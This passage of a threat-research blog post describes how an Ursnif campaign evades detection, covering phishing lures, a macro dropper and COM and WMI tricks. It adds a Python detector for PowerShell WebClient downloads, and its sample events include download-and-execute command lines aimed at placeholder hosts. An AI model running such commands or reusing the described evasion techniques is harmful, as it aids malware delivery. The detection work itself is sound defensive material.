HP Threat Research Blog Tricks and COMfoolery: How Ursnif Evades Detection


March 7, 2019 By: Alex Holland


  • Ursnif is one of the main threats effectively evading detection right now (at publication)
  • The dropper uses a COM technique to hide its process parentage
  • WMI is used to bypass a Windows Defender attack surface reduction rule
  • Fast evolution of delivery servers means detection tools are left in the dark

In February we saw a resurgence of Ursnif (also known as Gozi), a credential-stealing Trojan that was first uncovered in 2007 and has been active ever since. Alongside Emotet, this threat is one of the most pervasive and effective malware families currently being delivered through malicious spam campaigns.

The recent campaign we observed used a standard multi-stage malware delivery mechanism: a phishing email delivering a password-protected zip file that contains a Microsoft Word dropper with a VBA AutoOpen macro. When opened, the document downloads the Ursnif executable from a remote server using the PowerShell WebClient.DownloadFile, WebClient.DownloadString or WebClient.DownloadData methods. What sets this campaign apart from run-of-the-mill malicious spam is how Ursnif’s operators link different techniques together to socially engineer targets effectively, evade perimeter detection and bypass one of Windows Defender’s attack surface reduction rules.
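One way to hunt for the download stage described above, as an added example that is not from the original post: it scans process-creation events for PowerShell command lines that call the three WebClient methods, decoding any -EncodedCommand argument first. The event field names, the sample events and the example.test URLs are constructed for illustration.

```python
import base64
import re

# The three System.Net.WebClient methods named in the article.
METHODS = re.compile(r"\.\s*(DownloadFile|DownloadString|DownloadData)\s*\(", re.I)
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script text).
ENCODED = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)(\.exe)?$", re.I)

def expand_command_line(cmd):
    """Return the command line plus any decoded -EncodedCommand payloads."""
    parts = [cmd]
    for blob in ENCODED.findall(cmd):
        try:
            parts.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            pass  # not base64 / not UTF-16LE: keep only the raw text
    # Drop backticks and carets so a split method name still matches.
    return re.sub(r"[`^]", "", "\n".join(parts))

def find_webclient_downloads(events):
    """Return (index, method) for PowerShell launches calling a download method."""
    # The parent image is deliberately ignored: the article notes that the
    # dropper hides its process parentage, so Word need not be the parent.
    hits = []
    for i, ev in enumerate(events):
        if POWERSHELL.search(ev["image"]):
            for m in METHODS.finditer(expand_command_line(ev["command_line"])):
                hits.append((i, m.group(1).lower()))
    return hits

def encode_sample(script):  # builds the constructed -EncodedCommand sample
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (not from the article); example.test is a placeholder.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent": "wmiprvse.exe", "command_line":
     "powershell -nop (New-Object Net.WebClient).Down`loadFile('http://example.test/a','a.exe')"},
    {"image": PS, "parent": "explorer.exe", "command_line": "powershell -nop -enc "
     + encode_sample("IEX (New-Object Net.WebClient).DownloadString('http://example.test/b')")},
    {"image": PS, "parent": "explorer.exe", "command_line": "powershell -ExecutionPolicy Bypass -File inv.ps1"},
    {"image": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "parent": "explorer.exe",
     "command_line": "WINWORD.EXE /n invoice.docm"},
]

if __name__ == "__main__":
    for idx, method in find_webclient_downloads(SAMPLE_EVENTS):
        print(idx, method, "parent:", SAMPLE_EVENTS[idx]["parent"])
```

Matching on command-line content alone will also flag legitimate administration scripts that use WebClient, so hits need triage against known-good automation.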


Ursnif infection chain

Effective Social Engineering

Ursnif’s operators commonly tailor the phishing lure used against targets to make the email appear more authentic. In this campaign, this was done by basing attachment names and the message body on businesses in the same or related industries, or those that are geographically close to the target. In one of the samples we analysed, the target was a manufacturer of a niche product. The